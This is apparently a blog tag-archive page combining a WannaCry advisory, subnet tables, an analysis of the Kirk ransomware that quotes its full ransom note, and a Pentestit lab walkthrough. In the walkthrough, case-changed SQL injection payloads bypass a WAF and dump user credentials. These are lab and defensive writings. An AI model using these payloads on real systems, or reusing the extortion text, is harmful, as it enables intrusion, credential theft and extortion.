Tag Archives: Science

WannaCry a Birthday Gift??

I woke up on the 12th of May, it was my birthday, and I looked on the news feed and saw a burst of articles regarding the WannaCry Ransomware that has swept across the globe.

In the last few days, a new type of malware called Wannacrypt has done worldwide damage.  It combines the characteristics of ransomware and a worm and has hit a lot of machines around the world from different enterprises or government organizations:


While everyone’s attention related to this attack has been on the vulnerabilities in Microsoft Windows XP, please pay attention to the following:

  • The attack works on all versions of Windows if they haven’t been patched since the March patch release!
  • The malware can only exploit those vulnerabilities it first has to get on the network.  There are reports it is being spread via email phishing or malicious web sites, but these reports remain uncertain.


Please take the following actions immediately:

  • Make sure all systems on your network are fully patched, particularly servers.
  • As a precaution, please ask all colleagues at your location to be very careful about opening email attachments and minimise browsing the web while this attack is on-going.


The vulnerabilities are fixed by the below security patches from Microsoft which was released in Mar of 2017, please ensure you have patched your systems:


Details of the malware can be found below.  The worm scans port TCP/445 which is the windows SMB services for file sharing:


Preliminary study shows that our environment is not infected based on all hashes and domain found:




MD5 hash:



Per Symantec, here is a full list of the filetypes that are targeted and encrypted by WannaCry:

  • .123
  • .3dm
  • .3ds
  • .3g2
  • .3gp
  • .602
  • .7z
  • .ARC
  • .PAQ
  • .accdb
  • .aes
  • .ai
  • .asc
  • .asf
  • .asm
  • .asp
  • .avi
  • .backup
  • .bak
  • .bat
  • .bmp
  • .brd
  • .bz2
  • .cgm
  • .class
  • .cmd
  • .cpp
  • .crt
  • .cs
  • .csr
  • .csv
  • .db
  • .dbf
  • .dch
  • .der
  • .dif
  • .dip
  • .djvu
  • .doc
  • .docb
  • .docm
  • .docx
  • .dot
  • .dotm
  • .dotx
  • .dwg
  • .edb
  • .eml
  • .fla
  • .flv
  • .frm
  • .gif
  • .gpg
  • .gz
  • .hwp
  • .ibd
  • .iso
  • .jar
  • .java
  • .jpeg
  • .jpg
  • .js
  • .jsp
  • .key
  • .lay
  • .lay6
  • .ldf
  • .m3u
  • .m4u
  • .max
  • .mdb
  • .mdf
  • .mid
  • .mkv
  • .mml
  • .mov
  • .mp3
  • .mp4
  • .mpeg
  • .mpg
  • .msg
  • .myd
  • .myi
  • .nef
  • .odb
  • .odg
  • .odp
  • .ods
  • .odt
  • .onetoc2
  • .ost
  • .otg
  • .otp
  • .ots
  • .ott
  • .p12
  • .pas
  • .pdf
  • .pem
  • .pfx
  • .php
  • .pl
  • .png
  • .pot
  • .potm
  • .potx
  • .ppam
  • .pps
  • .ppsm
  • .ppsx
  • .ppt
  • .pptm
  • .pptx
  • .ps1
  • .psd
  • .pst
  • .rar
  • .raw
  • .rb
  • .rtf
  • .sch
  • .sh
  • .sldm
  • .sldx
  • .slk
  • .sln
  • .snt
  • .sql
  • .sqlite3
  • .sqlitedb
  • .stc
  • .std
  • .sti
  • .stw
  • .suo
  • .svg
  • .swf
  • .sxc
  • .sxd
  • .sxi
  • .sxm
  • .sxw
  • .tar
  • .tbk
  • .tgz
  • .tif
  • .tiff
  • .txt
  • .uop
  • .uot
  • .vb
  • .vbs
  • .vcd
  • .vdi
  • .vmdk
  • .vmx
  • .vob
  • .vsd
  • .vsdx
  • .wav
  • .wb2
  • .wk1
  • .wks
  • .wma
  • .wmv
  • .xlc
  • .xlm
  • .xls
  • .xlsb
  • .xlsm
  • .xlsx
  • .xlt
  • .xltm
  • .xltx
  • .xlw
  • .zip

As you can see, the ransomware covers nearly any important file type a user might have on his or her computer. It also installs a text file on the user’s desktop with the following ransom note:



Additional Resources for Week 3 RITx: CYBER501x Cybersecurity Fundamentals

Kerckhoff’s Principle


This video explains how the RSA public key and private key are created to be fully dependent on each other. The first part of the video explains the concepts with paint and colors. The second part contains heavy duty math, which may not be as easily understood:


These links detail the Heartbleed bug from 2014. This vulnerability shows that even though data is protected both in transit and at rest with encryption, data that is being processed is not protected. The encrypted data needs to be decrypted before it’s processed, and therefore is vulnerable at this stage.


Week 3 Additional Resources

Netmask Translation Table

This is a Netmask Translation Table. It can be used to determine what IPs should be used and which ones cannot be used.

Netmask                CIDR         Notes
=====================================================================        /32          Host (single address)        /31          Unusable        /30            4 IPs with   2 Usable        /29            8 IPs with   6 Usable        /28           16 IPs with  14 Usable        /27           32 IPs with  30 Usable        /26           64 IPs with  62 Usable        /25          128 IPs with 126 Usable          /24         256 IPs with  254 Usable "Class C"

Note: The first and last IP of a series are NOT usable and the first  
usable IP is normally set up for the router.
The 1st IP is the network address. The last IP is the broadcast address.

Each customer will be given their own unique IP block necessary to configure their own network. This unique IP information will be supplied by their Account Manager.

The below is only an EXAMPLE, do NOT use its IPs, instead, use those IP numbers that come from your Account Manager.

Your Account Manager should give you all the following information.

Dear Customer:

Your IP block is

Gateway IP address (Router IP)
Useable IP's              
Subnet Mask               

DNS Servers:    ns.cais.com

Subnetmask Translation Table

This is a Netmask Translation Table. It can be used to determine what IPs should be used and which ones cannot be used.

Subnetmask            Subnetmask (binary)                    CIDR         Notes
=================================================================================================       11111111.11111111.11111111.11111111    /32          Host (single address)       11111111.11111111.11111111.11111110    /31          Unusable       11111111.11111111.11111111.11111100    /30            4 IPs with   2 Usable       11111111.11111111.11111111.11111000    /29            8 IPs with   6 Usable       11111111.11111111.11111111.11110000    /28           16 IPs with  14 Usable       11111111.11111111.11111111.11100000    /27           32 IPs with  30 Usable       11111111.11111111.11111111.11000000    /26           64 IPs with  62 Usable       11111111.11111111.11111111.10000000    /25          128 IPs with 126 Usable         11111111.11111111.11111111.00000000    /24         256 IPs with  254 Usable 
                                                                                "Class C"         11111111.11111111.11111110.00000000    /23         11111111.11111111.11111100.00000000    /22         11111111.11111111.11111000.00000000    /21         11111111.11111111.11110000.00000000    /20         11111111.11111111.11100000.00000000    /19         11111111.11111111.11000000.00000000    /18         11111111.11111111.10000000.00000000    /17           11111111.11111111.00000000.00000000    /16         
                                                                                "Class B"           11111111.11111110.00000000.00000000    /15           11111111.11111100.00000000.00000000    /14           11111111.11111000.00000000.00000000    /13           11111111.11110000.00000000.00000000    /12           11111111.11100000.00000000.00000000    /11           11111111.11000000.00000000.00000000    /10           11111111.10000000.00000000.00000000    /9              11111111.00000000.00000000.00000000    /8         
                                                                                "Class A"             11111110.00000000.00000000.00000000    /7             11111100.00000000.00000000.00000000    /6             11111000.00000000.00000000.00000000    /5             11110000.00000000.00000000.00000000    /4             11100000.00000000.00000000.00000000    /3             11000000.00000000.00000000.00000000    /2             10000000.00000000.00000000.00000000    /1                00000000.00000000.00000000.00000000    /0         
                                                                                IP space

Note: The first and last IP of a series are NOT usable and the first  
usable IP is normally set up for the router.
The 1st IP is the network address. The last IP is the broadcast address.

Star Trek – Ransomware Brings us Monero and a Spock Decryptor!

Boldly going where no man has gone before, the Kirk Ransomware brings so much nerdy goodness to the table that it could make anyone in IT interested. We have Star Trek, Low Orbital Ion Cannons, a cryptocurrency payment other than Bitcoin, and a decryptor named Spock! Need I say more?

Discovered today by Avast malware researcher Jakub Kroustek, the Kirk Ransomware is written in Python and may be the first ransomware to utilize Monero as the ransom payment of choice.

Kirk Ransomware

At this time there are no known victims of this ransomware and it does not appear to be decryptable.  For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.

Kirk Ransomware uses Monero for Ransom Payments

Ever since Monero was released, it has been highly touted as a more secure and anonymous payment system than Bitcoin. This has caused  underground criminal sites, like AlphaBay, to accept it as payment and for criminals to mine it using mining Trojans. It was only a matter of time until ransomware developers started requesting it.

For possibly the first time, with the release of Kirk Ransomware, Monero has been introduced as a ransom payment. The problem is that this is only going to confuse victims even more. Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult.

How the Kirk Ransomware Encrypts a Computer

While it is not currently known how the Kirk Ransomware is being distributed, we do know that it is masquerading as the network stress tool called Low Orbital Ion Cannon.  Currently named loic_win32.exe, when executed Kirk Ransomware will now generate a AES password that will be used to encrypt a victim’s files. This AES key will then be encrypted by an embedded RSA-4096 public encryption key and saved in the file called pwd in the same directory as the ransomware executable.

If you plan on paying the ransom for the Kirk Ransomware, you must not delete the pwd file as it contains an encrypted version of your decryption key. Only the ransomware developer can decrypt this file and if a victim wishes to pay the ransom they will be required to send them this file.

Below is the current embedded RSA key used to encrypt the victim’s encryption key.

-----END PUBLIC KEY-----

Kirk Ransomware will now display a message box that displays the same slogan as the LOIC network stress tool. This slogan is: “Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0”.

Fake Low Orbital Ion Cannon Alert
Fake Low Orbital Ion Cannon Alert

At this point, the ransomware infection will begin to scan the C: drive for files that have certain file extensions. At the time of this writing, Kirk Ransomware targets 625 file types, which are listed at the end of the article.

If a matching file is detected, it will encrypt it using the previously created AES encryption key and then append the .kirked extension to the encrypted file’s name. For example, a file called test.jpg would be encrypted and renamed to test.jpg.kirked.

When the ransomware finishes encrypting the files it will drop a ransom note called RANSOM_NOTE.txt in the same folder as the executable. It will also display the ransom note in a Window on your desktop. A full version of the ransom note can be see at the end of the article.

This ransom note tells the victim that they must purchase ~1,100 worth of the Monero currency and send it to the enclosed Monero address. Once a payment is made, the victim must email the pwd file and the payment transaction ID to the kirk.help@scryptmail.com or kirk.payments@scryptmail.com email addresses to receive the decryptor.

The Spock Decryptor

This wouldn’t be a Star Trek themed ransomware without Spock. The developer agrees as they have named the decryptor “Spock” and it will be supplied to the victim once a a payment is made.

The Spock Decryptor

At this time we have not seen a sample of the decryptor, so cannot provide more info regarding it.

As previously said, unfortunately at this time the ransomware does not look like it can be decrypted.  For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.



Files associated with the Kirk Ransomware:



SHA256: 39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc

Targeted File Extensions:

.cfr,  .ytd,  .sngw,  .tst,  .skudef,  .dem,  .sims3pack,  .hbr,  .hkx,  .rgt,  .ggpk,  .ttarch2,  .hogg,  .spv,  .bm2,  .lua,  .dff,  .save,  .rgssad,  .scm,  .aud,  .rxdata,  .mcmeta,  .bin,  .mpqe,  .rez,  .xbe,  .grle,  .bf,  .iwd,  .vpp_pc,  .scb,  .naz,  .m2,  .xpk,  .sabs,  .nfs13save,  .gro,  .emi,  .wad,  .15,  .vfs,  .drs,  .taf,  .m4s,  .player,  .umv,  .sgm,  .ntl,  .esm,  .qvm,  .arch00,  .tir,  .bk,  .sabl,  .bin,  .opk,  .vfs0,  .xp3,  .tobj,  .rcf,  .sga,  .esf,  .rpack,  .DayZProfile,  .qsv,  .gam,  .bndl,  .u2car,  .psk,  .gob,  .lrf,  .lts,  .iqm,  .i3d,  .acm,  .SC2Replay,  .xfbin,  .db0,  .fsh,  .dsb,  .cry,  .osr,  .gcv,  .blk,  .4,  .lzc,  .umod,  .w3x,  .mwm,  .crf,  .tad,  .pbn,  .14,  .ppe,  .ydc,  .fmf,  .swe,  .nfs11save,  .tgx,  .trf,  .atlas,  .20,  .game,  .rw,  .rvproj2,  .sc1,  .ed,  .lsd,  .pkz,  .rim,  .bff,  .gct,  .9,  .fpk,  .pk3,  .osf,  .bns,  .cas,  .lfl,  .rbz,  .sex,  .mrm,  .mca,  .hsv,  .vpt,  .pff,  .i3chr,  .tor,  .01,  .utx,  .kf,  .dzip,  .fxcb,  .modpak,  .ydr,  .frd,  .bmd,  .vpp,  .gcm,  .frw,  .baf,  .edf,  .w3g,  .mtf,  .tfc,  .lpr,  .pk2,  .cs2,  .fps,  .osz,  .lnc,  .jpz,  .tinyid,  .ebm,  .i3exec,  .ert,  .sv4,  .cbf,  .oppc,  .enc,  .rmv,  .mta,  .otd,  .pk7,  .gm,  .cdp,  .cmg,  .ubi,  .hpk,  .plr,  .mis,  .ids,  .replay_last_battle,  .z2f,  .map,  .ut4mod,  .dm_1,  .p3d,  .tre,  .package,  .streamed,  .l2r,  .xbf,  .wep,  .evd,  .dxt,  .bba,  .profile,  .vmt,  .rpf,  .ucs,  .lab,  .cow,  .ibf,  .tew,  .bix,  .uhtm,  .txd,  .jam,  .ugd,  .13,  .dc6,  .vdk,  .bar,  .cvm,  .wso,  .xxx,  .zar,  .anm,  .6,  .ant,  .ctp,  .sv5,  .dnf,  .he0,  .mve,  .emz,  .e4mod,  .gxt,  .bag,  .arz,  .tbi,  .itp,  .i3animpack,  .vtf,  .afl,  .ncs,  .gaf,  .ccw,  .tsr,  .bank,  .lec,  .pk4,  .psv,  .los,  .civ5save,  .rlv,  .nh,  .sco,  .ims,  .epc,  .rgm,  .res,  .wld,  .sve,  .db1,  .dazip,  .vcm,  .rvm,  .eur,  .me2headmorph,  .azp,  .ags,  .12,  .slh,  .cha,  .wowsreplay,  .dor,  .ibi,  .bnd,  .zse,  .ddsx,  .mcworld,  .intr,  .vdf,  .mtr,  .addr,  .blp,  .mlx,  .d2i,  .21,  .tlk,  .gm1,  .n2pk,  .ekx,  .tas,  .rav,  .ttg,  .spawn,  .osu,  .oac,  .bod,  .dcz,  .mgx,  .wowpreplay,  .fuk,  .kto,  .fda,  .vob,  .ahc,  .rrs,  .ala,  .mao,  .udk,  .jit,  .25,  .swar,  .nav,  .bot,  .jdf,  .32,  .mul,  .szs,  .gax,  .xmg,  .udm,  .zdk,  .dcc,  .blb,  .wxd,  .isb,  .pt2,  .utc,  .card,  .lug,  .JQ3SaveGame,  .osk,  .nut,  .unity,  .cme,  .elu,  .db7,  .hlk,  .ds1,  .wx,  .bsm,  .w3z,  .itm,  .clz,  .zfs,  .3do,  .pac,  .dbi,  .alo,  .gla,  .yrm,  .fomod,  .ees,  .erp,  .dl,  .bmd,  .pud,  .ibt,  .24,  .wai,  .sww,  .opq,  .gtf,  .bnt,  .ngn,  .tit,  .wf,  .bnk,  .ttz,  .nif,  .ghb,  .la0,  .bun,  .11,  .icd,  .z3,  .djs,  .mog,  .2da,  .imc,  .sgh,  .db9,  .42,  .vis,  .whd,  .pcc,  .43,  .ldw,  .age3yrec,  .pcpack,  .ddt,  .cok,  .xcr,  .bsp,  .yaf,  .swd,  .tfil,  .lsd,  .blorb,  .unr,  .mob,  .fos,  .cem,  .material,  .lfd,  .hmi,  .md4,  .dog,  .256,  .eix,  .oob,  .cpx,  .cdata,  .hak,  .phz,  .stormreplay,  .lrn,  .spidersolitairesave-ms,  .anm,  .til,  .lta,  .sims2pack,  .md2,  .pkx,  .sns,  .pat,  .tdf,  .cm,  .mine,  .rbn,  .uc,  .asg,  .raf,  .myp,  .mys,  .tex,  .cpn,  .flmod,  .model,  .sfar,  .fbrb,  .sav2,  .lmg,  .tbc,  .xpd,  .bundledmesh,  .bmg,  .18,  .gsc,  .shader_bundle,  .drl,  .world,  .rwd,  .rwv,  .rda,  .3g2,  .3gp,  .asf,  .asx,  .avi,  .flv,  .ai,  .m2ts,  .mkv,  .mov,  .mp4,  .mpg,  .mpeg,  .mpeg4,  .rm,  .swf,  .vob,  .wmv,  .doc,  .docx,  .pdf,  .rar,  .jpg,  .jpeg,  .png,  .tiff,  .zip,  .7z,  .dif.z,  .exe,  .tar.gz,  .tar,  .mp3,  .sh,  .c,  .cpp,  .h,  .mov,  .gif,  .txt,  .py,  .pyc,  .jar,  .csv,  .psd,  .wav,  .ogg,  .wma,  .aif,  .mpa,  .wpl,  .arj,  .deb,  .pkg,  .db,  .dbf,  .sav,  .xml,  .html,  .aiml,  .apk,  .bat,  .bin,  .cgi,  .pl,  .com,  .wsf,  .bmp,  .bmp,  .gif,  .tif,  .tiff,  .htm,  .js,  .jsp,  .php,  .xhtml,  .cfm,  .rss,  .key,  .odp,  .pps,  .ppt,  .pptx,  .class,  .cd,  .java,  .swift,  .vb,  .ods,  .xlr,  .xls,  .xlsx,  .dot,  .docm,  .dotx,  .dotm,  .wpd,  .wps,  .rtf,  .sdw,  .sgl,  .vor,  .uot,  .uof,  .jtd,  .jtt,  .hwp,  .602,  .pdb,  .psw,  .xlw,  .xlt,  .xlsm,  .xltx,  .xltm,  .xlsb,  .wk1,  .wks,  .123,  .sdc,  .slk,  .pxl,  .wb2,  .pot,  .pptm,  .potx,  .potm,  .sda,  .sdd,  .sdp,  .cgm,  .wotreplay,  .rofl,  .pak,  .big,  .bik,  .xtbl,  .unity3d,  .capx,  .ttarch,  .iwi,  .rgss3a,  .gblorb,  .xwm,  .j2e,  .mpk,  .xex,  .tiger,  .lbf,  .cab,  .rx3,  .epk,  .vol,  .asset,  .forge,  .lng,  .sii,  .litemod,  .vef,  .dat,  .papa,  .psark,  .ydk,  .mpq,  .wtf,  .bsa,  .re4,  .dds,  .ff,  .yrp,  .pck,  .t3,  .ltx,  .uasset,  .bikey,  .patch,  .upk,  .uax,  .mdl,  .lvl,  .qst,  .ddv,  .pta

Ransom Note Text:

                     :xxoc;;,..                                        .
                    cWW0olkNMMMKdl;.                       .;llxxklOc,'
                   oWMKxd,  .,lxNKKOo;.                  :xWXklcc;.     ...'.
           k      lMMNl   .    ON.                         :c.             ''.  ':....
          .WXc   ;WMMMXNNXKKxdXMM.                                                .    .
          .NdoK: XMMMMMMMMMMMMMMM;oo;                                ...;,cxxxll.       .
          .WX.K0'WMMMWMMMMMWMNXWMooMWNO'                         ..,;OKNWWWWMMMMMXk:.
           KK:xKKWMMMXNMMMMW;  .. :WNKd,                ..    .'cdOXKXNNNNNWWMMMMMMMW0,
           lNMXXMMMMMMMMWWMMWKk,  ;0k'                    .,cxxk0K0O0XXWWMMMMMMMMMMMMMMX:..   ..
            ..,;XMMMMMMMWXWWK0KK: .;.                    .:lddddxOOO0XWMMMMMMMMMMMMMMMMMMO.    .,
              .kKXMMMMMWkoxolcc;..                      .':loodxO00OO0NNXNWMMMMMMMMMMMMMMMN;     '.
              .MK;kWMMMWWKOc.  .                        ..';cdxkKNX0kOOOKNMMMMMMMMMMMMMMMMMW:    .
              ,MW:,:x0NMMMMWW0x'                          ..,:dXNWW0xkkKWMMMMMMMMMMMMMMMMMMWk.  ..
              oMMN;    ;odoccc;c:.                         ...lXWWMOok0NMMMMMWNXKXKXWMMMMMMMOc.
              XMMMX,                                    ....';lldkWkodK0loc'.  .'lxx0kOKNMMMXo.
            'XMMMMMNc                                            .dldXWx.      ..,,coOXOkXMMMK,
       ,.   .:dk0KNWMk.                                 ...        .kWMK,.  ..:c .:.. .0MWMMMMO.
  .':x0K0:.          ..   .                                 .      .OWMNNXO:cccdxKXWMW0o0WWMMMM;.
 00000000000kdl:,'.                                      ..'o00l   'KMMNKNWWNKXWWMMMMMMMMMMMMMM0.
 0000000000000000000Oxl:'                                .;xKWWx  .xNMMMWNMMMMMMMMMMMMMMMMMMMMMMl
 0000000000000000000000000x;. ..,::,.                  .ck0KKk'   '0WMMMMMMMWWMMMMMMMMMMMMMMMMMM0.   .'
 0000000000000000000000000000Oxdllc:;,....,'...       .cdkOko:     ,cOKKXWMMMKd0WMMMMMMMMMMMMMWW0. 'Kc:,
 000000000000000000000000000000000OkkkxdoodxOkoooool   .;okOx,       .,'...cKMXl'oKWMMMMMMMWWNXN0  'MMc0.
 0000OO000000000000000000000000000000000000000kc.      .:dk0c         ,KNKxdKMMM0;;kMMMMMMMMWNKXO  ,kW0xl
 OdloxO000000000000000000000000000000000000000000x,     .,ll;      .lokKWMMMMMMMMM0xNMMMMMMMNXXNo.xK;cXKx
 lx000000000000000000000000000000000000000000000000l     .'..    .'cKWXOXMMMMMMMMMMMMMMMMMWWNXXNKX0MNkNK0..
 00000000000000000000000000000000000000000000000000O      ..    ..,;ok0X000KKXWMNNMMMMMMMMNNXKKXX00MMMWWc',
 00000000000000000000000000000000000000000000000000d              .. ..........;;.cKMMMMMWNXKKXNKxkNMMX,
 000000000000000000000000000000000000000Ko.0000000Ol                .'::odkkOOOxxxoxNMMMMNNWNXKK0k..;'
 0000000000000000000000000000000000000000..:000000kl             .:coododkXWMMMMMMMWWMMMNNNNNKOkkx:
 :;ok00000000000000000000000000000000000O.;.d00000dc        ...   .........cONMMMMMMMMMNXXXN0dlddxN.
 .dk000000000000000000000000000000000000;ld,.O00kocc        ..    ...,;::lokKNMMMMMMMMWKOO0OxloocxM:
 OO0000000000000000000000000000000000000ol0Koc0xc:ll  .         ..;lxO0XNNMMMMMMMMMMMN0xoxOdl::,;0Md
 :;,'..;loxk000000000000000000000000000000000lx..loo ,0          .'';lkKKNMMMMMMMMMNOd:;lc:;'..,kWMK
 cccldxkkkO00Okdooddxk00000000000000000000000Oc'lddl dK,            .':ollokOOOOOOOc'.........lXMMMM,
 000000kdoc,....;cldkO0000000000000000000000Okdodddo'K0'.                   .......        .oKMMMMMM0
 :,'....',;:ldkO0000000000000000000000000000Okxodddd;Xk,...                              .l0NMMMMMMMM:
 OO000000000000000000000000000000000000000000OkodxxxoXo,,,..                           .:kKWMMMMMMMMMW'
 dO0000000000000000000000000000000000000000000OodxxxkKl;,,,,                          'dOKWMMMMMMMMMMMX

      _  _____ ____  _  __   ____      _    _   _ ____   ___  __  ____        ___    ____  _____ 
     | |/ /_ _|  _ \| |/ /  |  _ \    / \  | \ | / ___| / _ \|  \/  \ \      / / \  |  _ \| ____|
     | ' / | || |_) | ' /   | |_) |  / _ \ |  \| \___ \| | | | |\/| |\ \ /\ / / _ \ | |_) |  _|  
     | . \ | ||  _ <| . \   |  _ <  / ___ \| |\  |___) | |_| | |  | | \ V  V / ___ \|  _ <| |___ 
     |_|\_\___|_| \_\_|\_\  |_| \_\/_/   \_\_| \_|____/ \___/|_|  |_|  \_/\_/_/   \_\_| \_\_____|

Oh no! The Kirk ransomware has encrypted your files!



Your computer has fallen victim to the Kirk malware and important files have been encrypted - locked
up so they don't work. This may have broken some software, including games, office suites etc.

Here's a list of some the file extensions that were targetted:

    .3g2      .rar      .jar      .cgi      .class    .jtd      .potx     .xex      .dds      
    .3gp      .jpg      .csv      .pl       .cd       .jtt      .potm     .tiger    .ff       
    .asf      .jpeg     .psd      .com      .java     .hwp      .sda      .lbf      .yrp      
    .asx      .png      .wav      .wsf      .swift    .602      .sdd      .cab      .pck      
    .avi      .tiff     .ogg      .bmp      .vb       .pdb      .sdp      .rx3      .t3       
    .flv      .zip      .wma      .bmp      .ods      .psw      .cgm      .epk      .ltx      
    .ai       .7z       .aif      .gif      .xlr      .xlw      .wotreplay.vol      .uasset   
    .m2ts     .dif.z    .mpa      .tif      .xls      .xlt      .rofl     .asset    .bikey    
    .mkv      .exe      .wpl      .tiff     .xlsx     .xlsm     .pak      .forge    .patch    
    .mov      .tar.gz   .arj      .htm      .dot      .xltx     .big      .lng      .upk      
    .mp4      .tar      .deb      .js       .docm     .xltm     .bik      .sii      .uax      
    .mpg      .mp3      .pkg      .jsp      .dotx     .xlsb     .xtbl     .litemod  .mdl      
    .mpeg     .sh       .db       .php      .dotm     .wk1      .unity3d  .vef      .lvl      
    mpeg4     .c        .dbf      .xhtml    .wpd      .wks      .capx     .dat      .qst      
    .rm       .cpp      .sav      .cfm      .wps      .123      .ttarch   .papa     .ddv      
    .swf      .h        .xml      .rss      .rtf      .sdc      .iwi      .psark    .pta      
    .vob      .mov      .html     .key      .sdw      .slk      .rgss3a   .ydk                
    .wmv      .gif      .aiml     .odp      .sgl      .pxl      .gblorb   .mpq                
    .doc      .txt      .apk      .pps      .vor      .wb2      .xwm      .wtf                
    .docx     .py       .bat      .ppt      .uot      .pot      .j2e      .bsa                
    .pdf      .pyc      .bin      .pptx     .uof      .pptm     .mpk      .re4                

There are an additional 441 file extensions that are targetted. They are mostly to do with games.

To get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of
infection will be charged double. Further time penalties are listed below. The time of infection has
been logged.

Any files with the extensions listed above will now have the extra extension '.kirked', these files
are encrypted using military grade encryption.

In the place you ran this program from, you should find a note (named RANSOM_NOTE.txt) similar to this one.
You will also find a file named 'pwd' - this is your encrypted password file. Although it was
generated by your computer, you have no way of ever decrypting it. This is due to the security
of both the way it was generated and the way it was encrypted. Your files were encrypted using
this password.

 ____  ____   ___   ____ _  __   _____ ___     _____ _   _ _____    ____  _____ ____   ____ _   _ _____ _ 
/ ___||  _ \ / _ \ / ___| |/ /  |_   _/ _ \   |_   _| | | | ____|  |  _ \| ____/ ___| / ___| | | | ____| |
\___ \| |_) | | | | |   | ' /     | || | | |    | | | |_| |  _|    | |_) |  _| \___ \| |   | | | |  _| | |
 ___) |  __/| |_| | |___| . \     | || |_| |    | | |  _  | |___   |  _ <| |___ ___) | |___| |_| | |___|_|
|____/|_|    \___/ \____|_|\_\    |_| \___/     |_| |_| |_|_____|  |_| \_\_____|____/ \____|\___/|_____(_)

  "Logic, motherfucker." ~ Spock.

Decrypting your files is easy. Take a deep breath and follow the steps below.

 1 ) Make the proper payment.
     Payments are made in Monero. This is a crypto-currency, like bitcoin.
     You can buy Monero, and send it, from the same places you can any other
     crypto-currency. If you're still unsure, google 'bitcoin exchange'.

     Sign up at one of these exchange sites and send the payment to the address below.

     Make note of the payment / transaction ID, or make one up if you have the option.

    Payment Address (Monero Wallet):

        Days   :  Monero  : Offer Expires
        0-2    :  50      : 03/18/17 15:32:14
        3-7    :  100     : 03/23/17 15:32:14
        8-14   :  200     : 03/30/17 15:32:14
        15-30  :  500     : 04/15/17 15:32:14

    Note: In 31 days your password decryption key gets permanently deleted.
          You then have no way to ever retrieve your files. So pay now.

 2 ) Email us.
     Send your pwd file as an email attachment to one of the email addresses below.
     Include the payment ID from step 1.

     Active email addresses:

 3 ) Decrypt your files.
     You will recieve your decrypted password file and a program called 'Spock'.
     Download these both to the same place and run Spock.
     Spock reads in your decrypted password file and uses it to decrypt all of the
     affected files on your computer.

     > IMPORTANT !
       The password is unique to this infection.
       Using an old password or one from another machine will result in corrupted files.
       Corrupted files cannot be retrieved.
       Don't fuck around.

 4 ) Breathe.

       _     _____     _______    _     ___  _   _  ____ 
      | |   |_ _\ \   / / ____|  | |   / _ \| \ | |/ ___|
      | |    | | \ \ / /|  _|    | |  | | | |  \| | |  _ 
      | |___ | |  \ V / | |___   | |__| |_| | |\  | |_| |
      |_____|___|  \_/  |_____|  |_____\___/|_| \_|\____|
                         _    _   _ ____     ____  ____   ___  ____  ____  _____ ____  
                        / \  | \ | |  _ \   |  _ \|  _ \ / _ \/ ___||  _ \| ____|  _ \ 
                       / _ \ |  \| | | | |  | |_) | |_) | | | \___ \| |_) |  _| | |_) |
                      / ___ \| |\  | |_| |  |  __/|  _ <| |_| |___) |  __/| |___|  _ < 
                     /_/   \_\_| \_|____/   |_|   |_| \_\\___/|____/|_|   |_____|_| \_\

Full version of the Ransom Note:

Full Ransom Note

Pentestit Lab v10 – The Site Token

In my previous post “Pentestit Lab v10 – The Mail Token”, we attained usernames through Intelligence Gathering, brute forced the SMTP Service, attained login credentials, and scored our first token. Today we will take our first steps at compromising the Global Data Security website – which will include the following:

  • Mapping the Attack Surface & Defenses
  • Exploiting SQL Injection w/ WAF Bypass
  • Cracking SQL Hashes
  • Finding the Site Token

If you are reading this post for the first time, and have no clue on what’s going on – then I suggest you start from the beginning and read “Pentestit Lab v10 – Introduction & Setup”.

I also included a ton of resources in my second post that I linked above – you should seriously check that out if you already haven’t!

Mapping the Attack Surface & Defenses:

Whenever we attempt to attack a web application, we have to start by mapping out the web app and its associated structure. That means finding directories, hidden links, files, URL Query’s, etc.

Once we mapped our application – we can start by looking for vulnerabilities such as SQL Injection, XSS, Path Traversal, etc.

For the Global Data Security website (which I will call GDS from now on), I considered the Security Blog a good starting point. 443 - Security Blog 443 – Security Blog

After going through all the links on the website, I noticed a particular URL parameter in the blog posts that caught my eye. mobile hack test page

Notice the id parameter being passed into the URL after post.php? We can actually test this parameter for SQL Injection!

Exploiting SQL Injection w/ WAF Bypass:

I began trying to exploit the id parameter, but for some reason every time I injected some SQL code, I was taken back to the home page.

This made me consider that there might be a WAF or Web Application Firewall in place, preventing me from exploiting this SQL Injection.

I decided to attempt a Case Change Bypass to see if I can somehow bypass the filter. This is due to the fact that some WAF’s only filter lowercase SQL keywords.

I began by injecting the following into the URL:,2%23

After submitting the query – you can see that the SQL Injection is in fact there, and that the Case Change allowed me to bypass the WAF filter. sql inject testing 1-2

Now that we got the SQL Injection to work – let’s start by pulling all the tables in the database with the following:,GroUp_ConCaT%28taBlE_SCheMa,0x20a,TAblE_NaME%29+FrOm+iNfOrmaTioN_scHeMa.TabLeS+WHerE+tAblE_SchEma=DaTabAsE%28%29%23 sql inject test page

Nice! Now that we got our table names, let’s pull all the columns from the “site” table.,GroUp_ConCaT%28TAblE_NaME,0x20,CoLumN_NaME%29+FrOm+iNfOrmaTioN_scHeMa.ColUmNs+WHerE+tAblE_SchEma=%27site%27%23 sql inject testing tables

We see that the users table has a username and password column, so let’s go ahead and dump any data in those columns.,GroUp_ConCaT%28useRnAMe,0x20,paSswOrD%29+FrOm+site.users%23 sql inject lindsey

Cracking MySQL Hashes:

Awesome, we got another username, and a SQL Hash of the associated user’s password. Let’s first start by saving the username for future reference, along with the other usernames we have.

root@kali:~/gds# nano names
root@kali:~/gds# cat names 

Since we got a SQL Hash, let’s use hash-identifier to see what type of hash it is. Then, we can use HashCat to try and crack it!

root@kali:~/gds# nano lindsey_hash
root@kali:~/gds# cat lindsey_hash 

root@kali:~/gds# hash-identifier
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
